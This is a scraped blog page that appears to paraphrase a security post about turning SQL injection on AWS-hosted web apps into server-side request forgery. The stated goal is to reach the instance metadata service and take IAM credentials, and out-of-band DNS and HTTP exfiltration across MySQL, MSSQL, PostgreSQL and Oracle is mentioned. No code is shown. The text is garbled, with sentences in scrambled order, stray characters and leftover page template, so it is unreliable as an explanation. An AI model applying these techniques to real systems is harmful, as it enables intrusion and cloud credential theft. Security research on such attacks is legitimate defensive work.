![]() The database connector being used in the application (and subsequently the database itself) supports stacked (multi) queries.For example, the AWS RDS user does not have the FILE_PRIV although the user appears to have full administrative access to the database. These services do not provide complete access to functions or restrict privileges to database users in such a way that file or network operations are restricted by design. The backend database which the application queries and uses as a datastore is not a managed service like RDS or Azure Database.Although, many of these assumptions may not hold true and you could still perform variations of what is covered in here to make the network requests We have to make some key assumptions here. ![]() This is often straightforward to do from a vanilla SSRF, but is there a way to do this using a SQL Injection? This blogpost attempts to provide some of the potential ways to make network requests and read them, all using SQL queries, across different database software. There are a lot of cool things you can do, if you get your hands on privileged tokens from the instance generated using an attached IAM role.Īs an attacker, one of the ways to move from attacking the application server or the database to attacking the entire AWS infrastructure will require the ability to generate and extract credentials from the instance metadata service. One of the key things that I personally go after when testing applications on AWS is the potential that the app may allow me to interact with the instance metadata service. What can you do as part of post exploitation, apart from data exfil? SQL Injection on a web application on AWS is no different than any other web app. DNS records show that this is located on AWS. Imagine you have found a SQL Injection on a web application on the Internet. This post highlights functions, packages, methods and techniques in 4 of the most popular RDBMS software - MySQL, MSSQL, PostgreSQL and Oracle, that can be used either via a SQL Injection or via a direct connection to the database to perform network requests resulting in Server Side Request (Forgeries). ![]() Again, these are well documented in a category of data extraction techniques called Out of Band Exploitation where data is exfiltrated through DNS or HTTP channels. ![]() These are used for database related operations, usually to fetch data from a file on a network share or on the Internet or to initiate connections to other servers etc.Īs attackers, SQL Injection often provides us the ability to interact with the database and call these functions. Post exploitation scenarios with SQL Injections commonly lead to, apart from the ability to interact with the database, the ability to read files, write files and sometimes to execute operating system commands.Īll modern databases have built-in functions or the ability to create procedures that provide some level of network access. SQL Injection is a well known, researched and publicized security vulnerability that has been used to attack web apps and steal data from backend databases for multiple decades now. References, all URLs from the post and further reading.Limited SSRF using master.xp_dirtree (and other file stored procedures). ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |